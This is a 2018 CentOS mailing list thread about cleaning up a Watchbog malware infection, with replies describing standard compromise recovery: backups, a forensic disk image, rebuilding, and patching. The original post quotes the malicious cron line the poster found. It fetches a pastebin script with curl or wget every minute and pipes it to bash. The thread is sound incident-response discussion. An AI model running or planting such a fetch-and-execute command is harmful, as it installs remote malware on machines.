On 12/18/18 8:31 AM, mark wrote:
Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
<kaushalshriyan@xxxxxxxxx> wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected
with malware? Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw
areransomware.html to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry */1 * * * * (curl -fsSL
https://pastebin.com/raw/aGTSGJJp||wget -q -O-
https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3)ps aux | grep watchbog
kill -9 pidof watchbog
Any suggestions or recommendations to find out how CentOS 7.5 Linux
box got infected with Watchbog Malware. Is there any open source
software which can
do you have untampered log files?
be installed on CentOS 7.5 Linux box to detect and prevent Malware?
Standard compromise recovery procedure since forever is (your local
policy my have slightly different order about notifications and similar):
1. back up all user data
You should have been doing that all along.
Do not exclude this from the [more or less] full list of standard
compromise recovery routine I tried to outline. Even though you had to
do backups all the time, backup at this point may have latest changes
not present in latest routine backup. And you last had o restore
something from your backup how many years ago? So your knowledge that
that backup indeed works was tested years ago...
First step, before you do anything else, is pull the hard drive, put it
into a hot-swap or external bay, and dd the entire drive to an identical
one. THAT goes to forensics.
Indeed. Or adjust this part to "everything is hosted on hardware RAID
device", for which you will have to boot off DVD, mount and dump all
elsewhere for forensics.
But! Forensics is different and sophisticated story, and when you learn
in depth that the first thing you will learn is: Powering off the
system, or even just disconnecting from the network may prevent you
totally from learning several things about compromise. But this is
really huge subject...
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
settings - that includes pulling the battery... *then* set what you need,
and then build it new, and restore from backups.
<snip>
Why, yes, we did just do this, um, last year, after a compromise via a
WordPress security hole. It did not manage to get to any other systems (we
checked, and only a few run WordPress).
And yes, preventing, no matter how tedious it may seem is orders of
magnitude easier than recovering from compromise. So: secure the box.
And update, update, update....
Valeri
mark
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
--
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
